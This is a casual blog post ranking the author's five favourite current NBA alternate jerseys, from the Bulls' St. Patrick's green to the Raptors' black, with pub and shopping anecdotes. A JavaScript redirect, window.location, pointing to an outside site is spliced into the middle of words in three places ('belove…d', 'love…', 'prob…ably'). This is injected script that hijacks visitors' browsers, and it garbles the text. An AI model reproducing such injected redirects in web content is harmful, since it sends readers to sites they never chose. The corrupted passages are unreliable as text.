My belovewindow.location=”http://occupyto.org/”;d Chicago Bulls were sporting the NBA Latin Nights ‘Los Bulls’ jersey tonight as they avenged that previous 2OT heartbreak loss to the Miami Heat, and my conversation with fellow Hoop Heads North blogger Romes during the game got me thinking – who’s got the nicest alternate jerseys in the NBA right NOW?!
Now…some of the NBA teams’ current alternate jerseys are actually franchise throwbacks, so I’ll take those out of consideration as I might do a throwback jersey post sometime down the road…although I’m sure that topic has been done time and time again during the height of the ‘Mitchell & Ness’ popularity. There are enough remaining alternates that I could easily do a ‘Top 5 WORST Alternate’ list – (Wizards anyone??) but we’ll save that for a future post!
So, without delay here’s my Top 5 FRESHEST & CURRENT NBA Alternate jerseys (click ‘Read more…’ below to continue):
5. Chicago Bulls – St. Patrick’s Day Edition (Kelly Green):

The Bulls, Raptors, Knicks, and Celtics all have a St. Patrick’s Day Edition jersey that they wear for select games during the week of St. Patrick’s Day each year. I personally enjoy the Bulls one, just because it’s so different to see the Bulls in all green.
Personal anecdote: I rocked this on St. Patty’s Day this year at The Old Triangle (Shout outs to Joel, Brent, Jesse, and Jill!), the Irish pub where I enjoyed a copious amount of pints for the day – but alas, my jersey has Ben Wallace on the back and I caught a lot of comments. Both props and people clownin’, but I just kept asking the haters who had more rings? Larry or Mike? 🙂
4. Los Angeles Clippers – Alternate Royal Blue:

Well, the Clippers don’t get a whole lot of lovewindow.location=”http://occupyto.org/”; in general, but I’m gonna help them out with that. I think these compliment their other two traditional home and away jerseys nicely, and royal blue is a classic colour.
3, Denver Nuggets – Alternate Navy Blue:

A dope look with the team name ‘Nuggets’ in script lettering, and different enough from the Powder Blue colourway they are usually wearing on the road.
2. Los Angeles Lakers – Alternate White:

These are usually reserved for Sunday home games. The all white jerseys are a really clean look, and are a perfect fit for Southern Cali! For some reason my girlfriend really dislikes these jerseys – but I really think they look sharp, so they’re on my list!
1. Toronto Raptors – Alternate Black:

With the Minnesota Timberwolves retiring their all black alternate road jerseys this season, the Raptors have now filled that void. This is currently my favourite NBA alternate jersey. A fresh look with a maple leaf logo just below the neck on the back of the jersey to set it off with subtle Canadian flair. It’s also the first time since 2003 that a Raptors jersey has donned the city of Toronto’s name across the chest. Sadly, I do not have this one in my personal jersey collection yet. I was considering getting a Jermaine O’Neal or a Jamario Moon at the beginning of the season, although I could probwindow.location=”http://occupyto.org/”;ably get a sweet deal on one now. I saw them at Foot Locker back in the fall, I just might have to swing back through. 🙂
Have a personal favourite(s)? Let’s hear it!
